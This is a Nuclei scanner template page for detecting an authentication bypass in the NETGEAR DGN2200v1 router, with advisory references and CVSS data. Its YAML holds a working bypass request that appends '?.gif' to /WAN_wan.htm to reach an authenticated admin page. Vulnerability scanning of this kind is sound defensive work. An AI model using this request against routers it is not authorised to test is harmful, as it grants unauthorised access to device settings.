Skip to content
Nuclei Templates

NETGEAR DGN2200v1 - Authentication Bypass

ID: netgear-router-auth-bypass

Severity: high

Author: gy741

Tags: netgear,auth-bypass,router

Description

Section titled “Description”

NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring.

YAML Source

Section titled “YAML Source”
id: netgear-router-auth-bypass


info:
  name: NETGEAR DGN2200v1 - Authentication Bypass
  author: gy741
  severity: high
  description: NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring.
  reference:
    - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
    - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cwe-id: CWE-287
  metadata:
    max-request: 2
  tags: netgear,auth-bypass,router


http:
  - raw:
      - |
        GET /WAN_wan.htm?.gif HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /WAN_wan.htm?.gif HTTP/1.1
        Host: {{Hostname}}
        Accept: */*


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200


      - type: word
        words:
          - "<title>WAN Setup</title>"
# digest: 4a0a00473045022100e4d489e351a0cb009efe6825ab4436fc850649d0b16fd89797e11fb24e2a2ee3022065d3afa90cd9020860622cdad7fa08c3d4f2c9b83a9ba75c4d8adee041cc930c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/netgear-router-auth-bypass.yaml"

View on Github